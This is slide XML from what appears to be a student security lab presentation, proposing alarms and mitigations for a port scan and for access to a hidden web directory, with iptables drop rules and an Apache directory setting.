          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;p69"/>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20</a:t>
            </a:fld>
            <a:endParaRPr sz="60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205"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p7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Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p70"/>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208" name="Google Shape;1208;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future port scans? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>Requests for ports other than 80 and 443 within the same timeframe from an IP address other than 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>5 attempts to access ports other than 80 or 443 from an IP address other than 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>What configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Develop a “Defense in Depth” strategy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Proactively Scan and audit network, on a regular basis, close ports that are not needed.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Implement a firewall rule using IPTABLES:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags SYN,ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SYN,ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -m state –state NEW -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags ALL NONE -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags SYN,FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SYN,FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags SYN,RST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SYN,RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags ALL SYN,RST,ACK,FIN,URG -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags FIN,RST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>FIN,RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags ACK,FIN FIN -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags ACK,PSH PSH -j DROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IPTABLES -A INPUT -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-flags ACK,URG URG -j DROP</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0">
              <a:latin typeface="+mj-lt"/>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213"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;p71"/>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Mitigation: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p71"/>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216" name="Google Shape;1216;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>“GET” request from an IP address other than 192.168.1.105 to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>. Send an email to administrator’s email</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&gt;0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>nano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;Directory /opt/apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Options None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"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221"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p72"/>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Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
